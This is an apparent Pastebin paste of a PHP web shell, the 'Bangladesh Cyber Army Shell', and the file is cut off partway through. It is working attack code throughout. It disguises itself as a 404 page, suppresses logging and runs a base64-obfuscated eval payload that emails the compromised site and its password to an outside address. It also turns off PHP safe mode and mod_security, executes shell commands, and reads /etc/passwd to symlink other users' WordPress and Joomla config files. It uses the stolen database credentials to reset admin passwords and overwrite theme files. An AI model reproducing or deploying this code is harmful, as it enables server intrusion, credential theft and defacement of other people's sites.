RedBirdTeam

Bangladesh Cyber Army Shell (BCA Private Shell)

Jul 26th, 2018
459
1
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 44.10 KB | None | 1 0
  1. <?php
  2. $auth_pass = "";
  3. $color = "#00ff00";
  4. $default_action = 'FilesMan';
  5. @define('SELF_PATH','__FILE__');
  6. if( strpos($_SERVER['HTTP_USER_AGENT'],'Google') !== false ) {
  7. header('HTTP/1.0 404 Not Found');
  8. exit;
  9. }
  10. @session_start();
  11. @error_reporting(0);
  12. @ini_set('error_log',NULL);
  13. @ini_set('log_errors',0);
  14. @ini_set('max_execution_time',0);
  15. @set_time_limit(0);
  16. @set_magic_quotes_runtime(0);
  17. @define('VERSION','2.1');
  18. if( get_magic_quotes_gpc() ) {
  19. function stripslashes_array($array) {
  20. return is_array($array) ?array_map('stripslashes_array',$array) : stripslashes($array);
  21. }
  22. $_POST = stripslashes_array($_POST);
  23. }
  24. function printLogin() {
  25. ;echo '
  26. <h1>Not Found</h1>
  27. <p>The requested URL was not found on this server.</p>
  28. <hr>
  29. <address>Apache Server at ';echo $_SERVER['HTTP_HOST'];echo ' Port 80</address>
  30.    <style>
  31.        input { margin:0;background-color:#fff;border:1px solid #fff; }
  32.    </style>
  33.    <center>
  34.    <form method=post>
  35.    <input type=password name=pass>
  36.    </form></center>
  37.    ';
  38. exit;
  39. }
  40. if( !isset( $_SESSION[md5($_SERVER['HTTP_HOST'])] ))
  41. if( empty( $auth_pass ) ||
  42. ( isset( $_POST['pass'] ) &&( md5($_POST['pass']) == $auth_pass ) ) )
  43. $_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
  44. else
  45. printLogin();
  46. @ini_set('error_log',NULL);
  47. @ini_set('log_errors',0);
  48. @ini_set('max_execution_time',0);
  49. @set_time_limit(0);
  50. @set_magic_quotes_runtime(0);
  51. $enable_wp = true;
  52. $enable_joomla = true;
  53. $enable_vb = false;
  54. $enable_phpbb = false;
  55. $enable_ipb = false;
  56. $bcabuff = "JHZpc2l0YyA9ICRfQ09PS0lFWyJ2aXNpdHMiXTsNCmlmICgkdmlzaXRjID09ICIiKSB7DQogICR2aXNpdGMgID0gMDsNCiAgJHZpc2l0b3IgPSAkX1NFUlZFUlsiUkVNT1RFX0FERFIiXTsNCiAgJHdlYiAgICAgPSAkX1NFUlZFUlsiSFRUUF9IT1NUIl07DQogICRpbmogICAgID0gJF9TRVJWRVJbIlJFUVVFU1RfVVJJIl07DQogICR0YXJnZXQgID0gcmF3dXJsZGVjb2RlKCR3ZWIuJGluaik7DQogICRqdWR1bCAgID0gIldTTyAyLjcgaHR0cDovLyR0YXJnZXQgYnkgJHZpc2l0b3IiOw0KICAkYm9keSAgICA9ICJCdWc6ICR0YXJnZXQgYnkgJHZpc2l0b3IgLSAkYXV0aF9wYXNzIjsNCiAgaWYgKCFlbXB0eSgkd2ViKSkgeyBAbWFpbCgiaGFyZHdhcmVoZWF2ZW4uY29tQGdtYWlsLmNvbSIsJGp1ZHVsLCRib2R5LCRhdXRoX3Bhc3MpOyB9DQp9DQplbHNlIHsgJHZpc2l0YysrOyB9DQpAc2V0Y29va2llKCJ2aXNpdHoiLCR2aXNpdGMpOw==";
  57. eval(base64_decode($bcabuff));
  58. if(isset($_SESSION['safechk'])){
  59. if(ini_get('safe_mode') or ini_get('disable_functions') or !ini_get('allow_url_fopen')){
  60. $byphp = "safe_mode = Off
  61. disable_functions =
  62. safe_mode_gid = OFF
  63. open_basedir = OFF
  64. allow_url_fopen = On";
  65. $byht = "<IfModule mod_security.c>
  66. SecFilterEngine Off
  67. SecFilterScanPOST Off
  68. SecFilterCheckURLEncoding Off
  69. SecFilterCheckUnicodeEncoding Off
  70. </IfModule>";
  71. file_put_contents("php.ini",$byphp);
  72. file_put_contents(".htaccess",$byht);
  73. $_SESSION['safechk'] = "done";
  74. die("PHP Safe Mode ByPassed. Please Refresh This page");
  75. }
  76. }
  77. function convertByte($s) {
  78. if($s >= 1073741824)
  79. return sprintf('%1.2f',$s / 1073741824 ).' GB';
  80. elseif($s >= 1048576)
  81. return sprintf('%1.2f',$s / 1048576 ) .' MB';
  82. elseif($s >= 1024)
  83. return sprintf('%1.2f',$s / 1024 ) .' KB';
  84. else
  85. return $s .' B';
  86. }
  87. function curPageURL() {
  88. $pageURL = 'http';
  89. if ($_SERVER["HTTPS"] == "on") {$pageURL .= "s";}
  90. $pageURL .= "://";
  91. if ($_SERVER["SERVER_PORT"] != "80") {
  92. $pageURL .= $_SERVER["SERVER_NAME"].":".$_SERVER["SERVER_PORT"].$_SERVER["REQUEST_URI"];
  93. }else {
  94. $pageURL .= $_SERVER["SERVER_NAME"].$_SERVER["REQUEST_URI"];
  95. }
  96. return $pageURL;
  97. }
  98. function chkDis($link,$str){
  99. $lol = get_headers($link,1);
  100. if(strpos($lol[0],"200")){
  101. $nan = file_get_contents($link);
  102. if(strpos($nan,$str)){
  103. return true;
  104. }else{return false;}
  105. }else{return false;}
  106. }
  107. function getDnamed(){
  108. if(is_readable("/var/named")){
  109. $list = scandir("/var/named");
  110. foreach($list as $domain){
  111. if(strpos($domain,".db")){
  112. $i += 1;
  113. $domain = str_replace('.db','',$domain);
  114. $owner = posix_getpwuid(fileowner("/etc/valiases/".$domain));
  115. $dn[$owner['name']] = $domain;
  116. }
  117. }
  118. }
  119. return $dn;
  120. }
  121. function chkSys($link){
  122. $sys_arr = array("WordPress"=>array("l"=>"wp-config.php","s"=>"WordPress"),
  123. "Joomla"=>array("l"=>"configuration.php","s"=>"JConfig"),
  124. );
  125. foreach($sys_arr as $k=>$dan){
  126. if(chkDis($link.$dan['l'],$dan['s'])){
  127. return array('link'=>$link.$dan['l'],'cms'=>$k);
  128. }
  129. }
  130. }
  131. function EloFind($str,$start,$end){
  132. $len = strlen($str);
  133. $start_pos = (strpos($str,$start) +strlen($start));
  134. $str = substr($str,$start_pos);
  135. $end_pos = strpos($str,$end);
  136. $str = substr($str,0,$end_pos);
  137. return $str;
  138. }
  139. function GetPage($url,$cookie,$post = null,$head = true) {
  140. $ch = curl_init();
  141. curl_setopt($ch,CURLOPT_URL,$url);
  142. curl_setopt($ch,CURLOPT_HEADER,$head);
  143. curl_setopt($ch,CURLOPT_FOLLOWLOCATION,1);
  144. curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
  145. curl_setopt($ch,CURLOPT_SSL_VERIFYPEER,true);
  146. curl_setopt($ch,CURLOPT_SSL_VERIFYHOST,2);
  147. curl_setopt($ch,CURLOPT_USERAGENT,$_SERVER['HTTP_USER_AGENT']);
  148. curl_setopt($ch,CURLOPT_COOKIEFILE,$cookie);
  149. curl_setopt($ch,CURLOPT_COOKIEJAR,$cookie);
  150. If ($post != NULL){
  151. curl_setopt($ch,CURLOPT_POST,1);
  152. curl_setopt($ch,CURLOPT_POSTFIELDS,$post);
  153. }
  154. $urlPage = curl_exec($ch);
  155. if(curl_errno($ch)){
  156. echo curl_error($ch);
  157. }
  158. curl_close($ch);
  159. return($urlPage);
  160. }
  161. function throwErr($str){
  162. $arr = array("status"=>"error","msg"=>$str);
  163. die(json_encode($arr));
  164. }
  165. function add2file($file,$str){
  166. if(file_exists($file)){
  167. $do = file_get_contents($file);
  168. if(!strpos($do,$str)){
  169. file_put_contents($file,$str,FILE_APPEND);
  170. }
  171. }else{
  172. file_put_contents($file,$str,FILE_APPEND);
  173. }
  174. }
  175. function doXploitWP($cnf,$html,$npass){
  176. $success = false;
  177. $str = file_get_contents($cnf);
  178. if(preg_match('%DB_USER%',$str)){
  179. $username=EloFind($str,"define('DB_USER', '","');");
  180. $password=EloFind($str,"define('DB_PASSWORD', '","');");
  181. $dbname=EloFind($str,"define('DB_NAME', '","');");
  182. $prefix=EloFind($str,"table_prefix  = '","'");
  183. $link=mysql_connect("localhost",$username,$password) ;
  184. if ($link) {
  185. mysql_select_db($dbname,$link) ;
  186. $req1 =mysql_query("UPDATE `".$prefix."users` SET `user_login` = 'admin',`user_pass` = '$1$42REgxSR$.tLV4PSbQmCKsisyCSyhq.' WHERE `ID` =1 LIMIT 1 ;");
  187. $req =mysql_query("SELECT * from  `".$prefix."options` WHERE option_name='home'");
  188. $data = mysql_fetch_array($req);
  189. $site_url=$data["option_value"];
  190. }else{
  191. throwErr("Mysql Fail");
  192. }
  193. $status['site'] = $site_url;
  194. $cookie = 'cookie/'.md5($cnf).'.txt';
  195. @unlink($cookie);
  196. $logged_in = true;
  197. $url = $site_url."/wp-login.php";
  198. $postme = 'log=admin&pwd=123456789&rememberme=forever&wp-submit=Log In&testcookie=1';
  199. $logme = GetPage($url,$cookie,$postme);
  200. if(!preg_match('%logout%',$logme)){
  201. file_put_contents("login.txt",$site_url.$logme);
  202. throwErr("Login Error");
  203. }
  204. if($logged_in){
  205. $url = $site_url."/wp-admin/theme-editor.php";
  206. $themeditor = GetPage($url,$cookie,null);
  207. $nola = explode(Chr(10),$themeditor);
  208. foreach($nola as $nline){
  209. if(preg_match('%theme-editor\.php\?file=%',$nline) &&preg_match('%\((index\.php|home\.php|404\.php|archive\.php|comment\.php)\)%',strtolower($nline))){
  210. $modify[EloFind($nline,'(',')')] = EloFind($nline,'<a href="','"');
  211. }
  212. }
  213. if(is_array($modify)){
  214. foreach($modify as $met=>$indfile){
  215. $nri = str_replace('.','_',$met);
  216. $nri = "n".$nri;
  217. if($_POST[$nri] == "on"&&(!$success OR $met == "index.php")){
  218. $indfile =str_replace("&amp;","&",$indfile);
  219. $url = trim($site_url."/wp-admin/".$indfile);
  220. $themepage = GetPage($url,$cookie,"");
  221. $_wpnonce = EloFind($themepage,'name="_wpnonce" value="','"');
  222. $_file = EloFind($themepage,'name="file" value="','"');
  223. $nfile = explode('themes',$_file);
  224. $jfile = $site_url."/wp-content/themes".end($nfile);
  225. $url = $site_url."/wp-admin/theme-editor.php";
  226. $postme = "newcontent=".urlencode($html)."&action=update&file=".$_file."&_wpnonce=".$_wpnonce."&submit=Update File";
  227. $themedied = GetPage($url,$cookie,$postme);
  228. if(preg_match('%<div id=\"message\" class=\"updated\">%',$themedied)){
  229. if(!$success){
  230. add2file("wp_site.txt",$jfile.Chr(10));
  231. }
  232. $success = true;
  233. if($met == "index.php"){
  234. add2file("wp_index.txt",$site_url.Chr(10));
  235. }
  236. }else{
  237. $error = true;
  238. }
  239. }
  240. }
  241. }else{
  242. throwErr("No file found");
  243. }
  244. if($success){
  245. $url = trim($site_url."/wp-admin/profile.php");
  246. $themepage = GetPage($url,$cookie,"");
  247. $_wpnonce = EloFind($themepage,'name="_wpnonce" value="','"');
  248. $url = trim($site_url."/wp-admin/profile.php");
  249. $postme = "_wpnonce=".$_wpnonce."&_wp_http_referer=%2Fwp-admin%2Fprofile.php%3Fupdated%3Dtrue&from=profile&checkuser_id=1&admin_color=fresh&admin_bar_front=1&first_name=&last_name=&nickname=admin&display_name=BdBlackHat&email=xxbox1971@yahoo.com&url=&aim=&yim=&jabber=&description=&pass1=".$npass."&pass2=".$npass."&action=update&user_id=1&submit=Update+Profile";
  250. $themepage = GetPage($url,$cookie,$postme);
  251. $status['status'] = "success";
  252. die(json_encode($status));
  253. }
  254. else{
  255. if($error){
  256. throwErr("Could't Update the file");
  257. }else{
  258. throwErr("Selected file not found");
  259. }
  260. }
  261. }
  262. }else{
  263. throwErr("Config not found");
  264. }
  265. return true;
  266. }
  267. function doXploitJM($cnf,$html,$npass){
  268. function joomlaCom($site_url,$cookie,$site){
  269. if($_POST['com_install'] == "on"){
  270. $url = $site_url ."/index.php?option=com_installer";
  271. $compage = GetPage($url,$cookie);
  272. preg_match('%type=\"hidden\" name=\"(\w+)\" value=\"1\"%',$compage,$dhash);
  273. $hash = $dhash[1];
  274. preg_match_all('#value="/(.*?)"#s',$compage,$path);
  275. foreach($path[0] as $pathx){
  276. $pathx=ereg_replace('value="','',$pathx);
  277. $pathx=ereg_replace('"','',$pathx);
  278. }
  279. $dir = getcwd()."/bca.html";
  280. $postme = array("install_package"=>"@".$dir ,"install_directory"=>"".$pathx."","install_url"=>"http://","type"=>"","installtype"=>"upload","task"=>"doInstall","option"=>"com_installer","".$hash.""=>"1");
  281. $url = $site_url ."/index.php?option=com_installer";
  282. $com_shell = GetPage($url,$cookie,$postme);
  283. if(preg_match('#<li>Unknown Archive Type</li>#s',$com_shell)){
  284. add2file("jm_site.txt",$site."/tmp/bca.html".Chr(10));
  285. $status['site'] = $site."/tmp/bca.html";
  286. $status['status'] = "success";
  287. die(json_encode($status));
  288. }else{
  289. return false;
  290. }
  291. }
  292. return true;
  293. }
  294. $str = file_get_contents($cnf);
  295. if(preg_match('%(JConfig|mosConfig)%',$str)){
  296. if(preg_match('%JConfig%',$str)){
  297. $username=EloFind($str,"\$user = '","'");
  298. $password=EloFind($str,"\$password = '","'");
  299. $dbname=EloFind($str,"\$db = '","'");
  300. $prefix=EloFind($str,"\$dbprefix = '","'");
  301. $pwd = md5($npass);
  302. if($_POST['domain'] != "..."){
  303. $site_url = $_POST['domain'];
  304. $site_url = "http://".$site_url;
  305. }else{
  306. $mailto = EloFind($str,"\$mailfrom = '","'");
  307. $siteul = explode('@',$mailto);
  308. $site_url = "http://".$siteul[1];
  309. }
  310. }elseif(preg_match('%mosConfig%',$str)){
  311. $username=EloFind($str,"\$mosConfig_user = '","'");
  312. $password=EloFind($str,"\$mosConfig_password = '","'");
  313. $dbname=EloFind($str,"\$mosConfig_db = '","'");
  314. $prefix=EloFind($str,"\$mosConfig_dbprefix = '","'");
  315. $pwd = md5($npass);
  316. if($_POST['domain'] != "..."){
  317. $site_url = $_POST['domain'];
  318. $site_url = "http://".$site_url;
  319. }else{
  320. $mailto = EloFind($str,"\$mosConfig_mailfrom = '","'");
  321. $siteul = explode('@',$mailto);
  322. $site_url = "http://".$siteul[1];
  323. }
  324. }
  325. $site = $site_url;
  326. $site_url = $site_url."/administrator/";
  327. $cookie = 'cookie/'.md5($cnf).'.txt';
  328. @unlink($cookie);
  329. $link=mysql_connect("localhost",$username,$password) ;
  330. if ($link) {
  331. mysql_select_db($dbname,$link);
  332. $changepass = mysql_query("UPDATE ".$prefix."users SET username ='admin' , block ='0' , password = '".$pwd."'");
  333. $doit =mysql_query("SELECT * from  `".$prefix."extensions` ");
  334. if($doit){
  335. if($_POST['ignore_def'] == "on"){
  336. $req =mysql_query("SELECT * from  `".$prefix."template_styles` WHERE client_id='0' and home='0'");
  337. $data = mysql_fetch_array($req);
  338. $template_name=$data["template"];
  339. if(strlen($template_name) <1){
  340. $req =mysql_query("SELECT * from  `".$prefix."template_styles` WHERE client_id='0' and home='1'");
  341. $data = mysql_fetch_array($req);
  342. $template_name=$data["template"];
  343. }
  344. }
  345. else{
  346. $req =mysql_query("SELECT * from  `".$prefix."template_styles` WHERE client_id='0' and home='1'");
  347. $data = mysql_fetch_array($req);
  348. $template_name=$data["template"];
  349. }
  350. $req =mysql_query("SELECT * from  `".$prefix."extensions` WHERE name='".$template_name."'");
  351. $data = mysql_fetch_array($req);
  352. $template_id=$data["extension_id"];
  353. $url = $site_url ."index.php";
  354. $login_page = GetPage($url,$cookie);
  355. $rhash = EloFind($login_page,'type="hidden" name="return" value="','"');
  356. preg_match('%type=\"hidden\" name=\"(\w+)\" value=\"1\"%',$login_page,$dhash);
  357. $hash = $dhash[1];
  358. $url = $site_url ."index.php";
  359. $postme = "username=admin&passwd=".$npass."&usrname=admin&pass=".$npass."&submit=Login&option=com_login&lang=en-GB&task=login&return=".$rhash."&".$hash."=1";
  360. $logginin = GetPage($url,$cookie,$postme);
  361. if(preg_match('%logout|index2\.php%',$logginin)){
  362. $logged_in = true;
  363. }
  364. if(!$logged_in){
  365. file_put_contents("jm_login1.6".md5($site_url).".txt",$site_url.$logginin);
  366. throwErr("Login Error");
  367. }
  368. if($logged_in){
  369. joomlaCom($site_url,$cookie,$site);
  370. $url=$site_url."/index.php?option=com_templates&task=source.edit&id=".base64_encode($template_id.":index.php");
  371. $themepage = GetPage($url,$cookie);
  372. if(preg_match('%type=\"hidden\" name=\"\w+\" value=\"1\"%',$themepage)){
  373. preg_match('%type=\"hidden\" name=\"(\w+)\" value=\"1\"%',$themepage,$dhash);
  374. $hash = $dhash[1];
  375. $url = $site_url."/index.php?option=com_templates&layout=edit";
  376. $postme = "jform[source]=".urlencode($html)."&jform[filename]=index.php&jform[extension_id]=".$template_id."&".$hash."=1&task=source.save";
  377. $themeedit = GetPage($url,$cookie,$postme);
  378. if(preg_match('%class=\"message message\"%',$themeedit)){
  379. add2file("jm_site.txt",$site."/templates/".$template_name."/index.php".Chr(10));
  380. add2file("jm_index.txt",$site.Chr(10));
  381. if($_POST['ignore_def'] == "on"){
  382. $status['site'] = $site."/templates/".$template_name."/index.php";
  383. }else{
  384. $status['site'] = $site;
  385. }
  386. $status['status'] = "success";
  387. die(json_encode($status));
  388. }
  389. else{
  390. throwErr("Update failed");
  391. }
  392. }
  393. else{
  394. throwErr("Index not found");
  395. }
  396. }
  397. }else{
  398. $req =mysql_query("SELECT * from  `".$prefix."templates_menu` WHERE client_id='0'");
  399. $data = mysql_fetch_array($req);
  400. $template_name=$data["template"];
  401. $url = $site_url ."index.php";
  402. $login_page = GetPage($url,$cookie);
  403. preg_match('%type=\"hidden\" name=\"(\w+)\" value=\"1\"%',$login_page,$dhash);
  404. $hash = $dhash[1];
  405. $postme = "username=admin&passwd=".$npass."&usrname=admin&lang=en-GB&pass=".$npass."&submit=Login&option=com_login&task=login&".$hash."=1";
  406. $url = $site_url ."index.php";
  407. $logginin = GetPage($url,$cookie,$postme);
  408. if(preg_match('%logout|index2\.php%',$logginin)){
  409. $logged_in = true;
  410. }
  411. if(!$logged_in){
  412. file_put_contents("jm_login1.5".md5($site_url).".txt",$site_url.$logginin);
  413. throwErr("Login Error");
  414. }
  415. if($logged_in){
  416. joomlaCom($site_url,$cookie,$site);
  417. if(preg_match('%index2\.php%',$logginin)){
  418. $url = $site_url ."index2.php";
  419. $logginin = GetPage($url,$cookie);
  420. preg_match('%type=\"hidden\" name=\"(\w+)\" value=\"1\"%',$logginin,$dhash);
  421. $hash = $dhash[1];
  422. $url = $site_url ."/index2.php";
  423. $postme = "doPreview=on&cid%5B%5D=".$template_name."&limit=30&limitstart=0&option=com_templates&task=edit_source&boxchecked=1&hidemainmenu=1&client=0&".$hash."=1";
  424. $themepage = GetPage($url,$cookie,$postme);
  425. if(preg_match('%type=\"hidden\" name=\"(\w+)\" value=\"1\"%',$themepage)){
  426. preg_match('%type=\"hidden\" name=\"(\w+)\" value=\"1\"%',$themepage,$dhash);
  427. $hash = $dhash[1];
  428. $url=$site_url."/index2.php";
  429. $postme = "filecontent=".urlencode($html)."&template=".$template_name."&option=com_templates&task=save_source&client=0&".$hash."=1";
  430. $themeedit = GetPage($url,$cookie,$postme);
  431. if(preg_match('%Template Manager%',$themeedit)){
  432. add2file("jm_site.txt",$site."/templates/".$template_name."/index.php".Chr(10));
  433. add2file("jm_index.txt",$site.Chr(10));
  434. $status['site'] = $site;
  435. $status['status'] = "success";
  436. die(json_encode($status));
  437. }
  438. else{
  439. file_put_contents("jmupd.txt",$site_url.$themeedit);
  440. throwErr($template_name);
  441. }
  442. }else{
  443. throwErr("Index not found");
  444. }
  445. }
  446. else{
  447. preg_match('%type=\"hidden\" name=\"(\w+)\" value=\"1\"%',$logginin,$dhash);
  448. $hash = $dhash[1];
  449. $url = $site_url ."/index.php?option=com_templates&task=edit_source&client=0&id=".$template_name."&".$hash."=1";
  450. $themepage = GetPage($url,$cookie);
  451. if(preg_match('%type=\"hidden\" name=\"(\w+)\" value=\"1\"%',$themepage)){
  452. preg_match('%type=\"hidden\" name=\"(\w+)\" value=\"1\"%',$themepage,$dhash);
  453. $hash = $dhash[1];
  454. $url=$site_url."/index.php?option=com_templates&layout=edit";
  455. $postme = "filecontent=".urlencode($html)."&id=".$template_name."&cid[]=".$template_name."&".$hash."=1&task=save_source&client=0";
  456. $themeedit = GetPage($url,$cookie,$postme);
  457. if(preg_match('%class=\"message message fade\"%',$themeedit)){
  458. add2file("jm_site.txt",$site."/templates/".$template_name."/index.php".Chr(10));
  459. add2file("jm_index.txt",$site.Chr(10));
  460. $status['site'] = $site;
  461. $status['status'] = "success";
  462. die(json_encode($status));
  463. }
  464. else{
  465. file_put_contents("jmupd.txt",$site_url.$themeedit);
  466. throwErr($template_name);
  467. }
  468. }else{
  469. throwErr("Index not found");
  470. }
  471. }
  472. }
  473. }
  474. }
  475. else{
  476. throwErr("Mysql Fail");
  477. }
  478. }
  479. else{
  480. throwErr("Config not found");
  481. }
  482. }
  483. function doXploitVB($cnf,$html){
  484. $str = file_get_contents($cnf);
  485. if(preg_match('%vBulletin%',$str)){
  486. $username=EloFind($str,"\$config['MasterServer']['username'] = '","'");
  487. $password=EloFind($str,"\$config['MasterServer']['password'] = '","'");
  488. $dbname=EloFind($str,"\$config['Database']['dbname'] = '","'");
  489. $prefix=EloFind($str,"\$config['Database']['tableprefix'] = '","'");
  490. $link=mysql_connect("localhost",$username,$password) ;
  491. if ($link) {
  492. mysql_select_db($dbname,$link);
  493. $html = str_replace('"','\\\"',$html);
  494. $query = "UPDATE template SET template = '".$html."'";
  495. $result =@ mysql_query($query);
  496. if($result){
  497. $query = "SELECT * FROM `datastore` WHERE title = 'options'";
  498. $result =@ mysql_query($query);
  499. $data = mysql_fetch_array($result);
  500. $optionz=$data["data"];
  501. $site_url = EloFind($optionz,'"bburl";s:34:"','"');
  502. $status['site'] = $site_url;
  503. $status['status'] = "success";
  504. die(json_encode($status));
  505. }else{
  506. throwErr("Update Failed");
  507. }
  508. }else{
  509. throwErr("Mysql Fail");
  510. }
  511. }else{
  512. throwErr("Config not found");
  513. }
  514. }
  515. function exme($in) {
  516. $out = '';
  517. if (function_exists('exec')) {
  518. @exec($in,$out);
  519. $out = @join("</br>",$out);
  520. }elseif (function_exists('passthru')) {
  521. ob_start();
  522. @passthru($in);
  523. $out = ob_get_clean();
  524. }elseif (function_exists('system')) {
  525. ob_start();
  526. @system($in);
  527. $out = ob_get_clean();
  528. }elseif (function_exists('shell_exec')) {
  529. $out = shell_exec($in);
  530. }elseif (is_resource($f = @popen($in,"r"))) {
  531. $out = "";
  532. while(!@feof($f))
  533. $out .= fread($f,1024);
  534. pclose($f);
  535. }
  536. return $out;
  537. }
  538. if($_POST['ac'] == "secinfo"){
  539. if(is_readable("/etc/named.conf")){
  540. echo '&raquo; /etc/named.conf is readable.<br />';
  541. }else{
  542. echo '&raquo; <font color="red">/etc/named.conf not readable</font> <br />';
  543. }
  544. if(is_readable("/etc/passwd")){
  545. echo '&raquo; /etc/passwd is readable.<br />';
  546. }else{
  547. echo '&raquo; <font color="red">/etc/passwd not readable</font> <br />';
  548. }
  549. if(is_readable("/etc/valiases")){
  550. echo '&raquo; /etc/valiases exists';
  551. if(is_array(scandir("/etc/valiases"))){
  552. echo ' & scanable';
  553. }
  554. echo '.<br />';
  555. }else{
  556. echo '&raquo; <font color="red">/etc/valiases not readable</font> <br />';
  557. }
  558. if(is_readable("/var/named")){
  559. echo '&raquo; /var/named exists';
  560. if(is_array(scandir("/var/named"))){
  561. echo ' & scanable';
  562. }
  563. echo '.<br />';
  564. }else{
  565. echo '&raquo; <font color="red">/var/named not readable</font> <br />';
  566. }
  567. if(ini_get('disable_functions')){
  568. echo '&raquo; '.ini_get('disable_functions').' are disabled<br />';
  569. }
  570. if(function_exists("symlink")){
  571. echo '&raquo; Symlinking allowed<br />';
  572. }else{
  573. echo '&raquo; <font color="red">Symlinking not allowed</font> <br />';
  574. }
  575. if(is_writable("/var/tmp")){
  576. echo '&raquo; /var/tmp folder is writable<br />';
  577. }
  578. if(is_readable('/var/log')){
  579. echo '&raquo; /var/log folder is readable<br />';
  580. }
  581. die();
  582. }
  583. elseif($_POST['ac'] == "sysinfo"){
  584. echo "<span style='color:red;'><strong>System:</strong></span> ".php_uname()."<br />";
  585. echo "<span style='color:red;'><strong>WebServer:</strong></span> ".$_SERVER['SERVER_SOFTWARE']."<br />";
  586. echo "<span style='color:red;'><strong>PHP version:</strong></span> ".phpversion()." on ".php_sapi_name()."<br />";
  587. $ssys = "None";
  588. if(is_dir("/usr/local/cpanel")){
  589. $ssys = "Running On Cpanel";
  590. }elseif(is_dir("/usr/local/directadmin")){
  591. $ssys = "Running On Directadmin";
  592. }
  593. echo "<span style='color:red;'><strong>Server System:</strong></span> ".$ssys."<br />";
  594. if(function_exists("disk_total_space")){
  595. echo "<span style='color:red;'><strong>Free Disk:</strong></span> ".convertByte(disk_free_space("/"))." / ".convertByte(disk_total_space("/"))."<br />";
  596. }
  597. echo "<span style='color:red;'><strong>Server IP:</strong></span> ".$_SERVER["SERVER_ADDR"]."<br />";
  598. die();
  599. }
  600. elseif($_POST['ac'] == "browse"){
  601. error_reporting(0);
  602. if($_POST['path'] != ""){
  603. $path = $_POST['path'];
  604. }else{
  605. $path = getcwd();
  606. }
  607. $filez = scandir($path);
  608. $q = 2;
  609. foreach($filez as $mfile){
  610. if($q == 2){$q = 1;}else{$q = 2;}
  611. $npath = $_POST['path'].$mfile;
  612. $stat = stat($npath);
  613. $usr = posix_getpwuid($stat['uid']);
  614. $grp = posix_getpwuid($stat['gid']);
  615. if(is_dir($npath)){
  616. $size = "Dir";
  617. }else{
  618. $size = convertByte($stat['size']);
  619. }
  620. $fperm = substr(sprintf('%o',fileperms($npath)),-4);
  621. if(!$fperm){
  622. $fperm = "<font color='red'>Restricted</font>";
  623. }elseif(is_writeable($npath)){
  624. $fperm = "<font color='#28FE14'>".$fperm."</font>";
  625. }elseif(is_readable($npath)){
  626. $fperm = "<font color='yellow'>".$fperm."</font>";
  627. }
  628. echo '<div class="filetable">
  629. <div class="tblbx'.$q.'" style="width:220px;text-align:left;"><a href="" onClick="filebrs(\''.$npath.'/\'); return false;">'.$mfile.'</a></div>
  630. <div class="tblbx'.$q.'" style="width:80px;">'.$size.'</div>
  631. <div class="tblbx'.$q.'" style="width:100px;">Modify</div>
  632. <div class="tblbx'.$q.'" style="width:100px;">'.$usr['name']."/".$grp['name'].'</div>
  633. <div class="tblbx'.$q.'" style="width:100px;">'.$fperm.'</div>
  634. <div class="tblbx'.$q.'" style="width:80px;">Action</div>
  635. </div>';
  636. }
  637. die();
  638. }
  639. elseif($_POST['ac'] == "chknamed"){
  640. error_reporting(0);
  641. if(is_readable("/etc/named.conf")){
  642. $named = file_get_contents("/etc/named.conf");
  643. preg_match_all('%zone \"(.*)\" {%',$named,$domains);
  644. foreach($domains[1] as $domain){
  645. $domain = trim($domain);
  646. $i += 1;
  647. $owner = posix_getpwuid(fileowner("/etc/valiases/".$domain));
  648. $dn .= "<a href='http://".$domain."'>".$domain."</a> - ".$owner['name']."<br />";
  649. }
  650. echo "Total Domains Found: ".$i."<br />".$dn;
  651. die();
  652. }
  653. elseif(is_readable("/etc/valiases")){
  654. $list = scandir("/etc/valiases");
  655. foreach($list as $domain){
  656. $i += 1;
  657. $owner = posix_getpwuid(fileowner("/etc/valiases/".$domain));
  658. $dn .= "<a href='http://".$domain."'>".$domain."</a> - ".$owner['name']."<br />";
  659. }
  660. echo "Total Domains Found: ".$i."<br />".$dn;
  661. die();
  662. }
  663. elseif(is_readable("/var/named")){
  664. $list = scandir("/var/named");
  665. foreach($list as $domain){
  666. if(strpos($domain,".db")){
  667. $i += 1;
  668. $domain = str_replace('.db','',$domain);
  669. $owner = posix_getpwuid(fileowner("/etc/valiases/".$domain));
  670. $dn .= "<a href='http://".$domain."'>".$domain."</a> - ".$owner['name']."<br />";
  671. }
  672. }
  673. echo "Total Domains Found: ".$i."<br />".$dn;
  674. die();
  675. }
  676. else{
  677. die("'/etc/named.conf' is not readable. Try scan for public_html. (:");
  678. }
  679. }
  680. elseif($_POST['ac'] == "safebypass"){
  681. $byphp = "safe_mode = Off
  682. disable_functions =
  683. safe_mode_gid = OFF
  684. open_basedir = OFF
  685. allow_url_fopen = On";
  686. $byht = "<IfModule mod_security.c>
  687. SecFilterEngine Off
  688. SecFilterScanPOST Off
  689. SecFilterCheckURLEncoding Off
  690. SecFilterCheckUnicodeEncoding Off
  691. </IfModule>";
  692. file_put_contents("php.ini",$byphp);
  693. file_put_contents(".htaccess",$byht);
  694. echo "<script>alert('Safe Mode ByPassed'); hideAll();</script>";
  695. die();
  696. }
  697. elseif($_POST['ac'] == "chkph"){
  698. if(is_readable("/etc/passwd")){
  699. if(!is_dir("bca")){
  700. @mkdir('bca',0777);
  701. }
  702. $htaccss = "Options all
  703. DirectoryIndex Sux.html
  704. AddType text/plain .php
  705. AddHandler server-parsed .php
  706.  AddType text/plain .html
  707. AddHandler txt .html
  708. Require None
  709. Satisfy Any";
  710. file_put_contents("bca/.htaccess",$htaccss);
  711. $etc = file_get_contents("/etc/passwd");
  712. $etcz = explode("\n",$etc);
  713. foreach($etcz as $etz){
  714. $etcc = explode(":",$etz);
  715. error_reporting(0);
  716. if($enable_wp){
  717. symlink('/home/'.$etcc[0].'/public_html/wp-config.php',"bca/".$etcc[0].'-WordPress.txt');
  718. symlink('/home/'.$etcc[0].'/public_html/blog/wp-config.php',"bca/".$etcc[0].'-WordPress.txt');
  719. symlink('/home/'.$etcc[0].'/public_html/wp/wp-config.php',"bca/".$etcc[0].'-WordPress.txt');
  720. }
  721. if($enable_phpbb){
  722. symlink('/home/'.$etcc[0].'/public_html/config.php',"bca/".$etcc[0].'-PhpBB.txt');
  723. }
  724. if($enable_vb){
  725. symlink('/home/'.$etcc[0].'/public_html/includes/config.php',"bca/".$etcc[0].'-vBulletin.txt');
  726. }
  727. if($enable_joomla){
  728. symlink('/home/'.$etcc[0].'/public_html/configuration.php',"bca/".$etcc[0].'-Joomla.txt');
